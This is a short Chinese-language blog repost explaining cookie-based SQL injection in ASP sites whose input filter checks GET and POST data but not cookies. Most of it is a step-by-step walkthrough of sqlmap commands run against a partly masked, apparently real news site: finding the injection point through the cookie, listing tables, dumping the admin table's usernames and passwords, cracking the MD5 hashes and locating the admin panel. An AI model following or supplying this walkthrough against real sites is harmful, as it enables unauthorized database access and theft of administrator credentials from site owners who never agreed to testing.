cookie注入

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cookie注入相关的知识,希望对你有一定的参考价值。

我先说一下什么是cookies注入,如果你学过ASP,你应该知道Request.QueryString(get)或Requset.FORM)(POST)

这就是我们读取用户发给WEB服务器的指定键的值!
有时我们为了简化代码,会写成

ID=Request("ID")

这样写法是简单,但是问题就来了

cookie注入利用的环境

我们知道WEB服务是怎样读取数据的,他是先GET中的数据,没有再取POST中的数据,还回去取cookies中的数据

我们再看看房主入系统,她会检测GET和POST中的数据。如果有特殊字符(‘   and   order by)禁止数据的提交,比如下图所示:

技术分享

但是它并没有检测cookies中的数据,所以我们就可以对这个网站发动攻击。

技术分享

可以看到ID=205,所以我们可以用sqlmap对这个网站发动攻击.

1:首先打开sqlmap,需要声明一点,在sqlmap中使用cookie注入,level >=2才行

输入命令:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2
检测到此url含有注入点,再来!


2:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2  --tables   获取数据库中的所有表

技术分享



3:接下来对这个admin进行检测sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin --column

技术分享

4:然后对这个username和password进行爆破

sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin -C username,password --dump

技术分享

5:爆出来后密码是用md5形式加密的,所以拿到相应的网站解密就可以了。然后就是找后台就可以了;


结束!

本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918560

以上是关于cookie注入的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入:sqli-labs 20 Cookie注入

sqlmap cookies站点的中转注入

利用Cookie劫持+HTML注入进行钓鱼攻击

cookie注入

cookie注入原理及注入检测

利用cookie进行SQL注入——看来还是人工注入要熟悉才行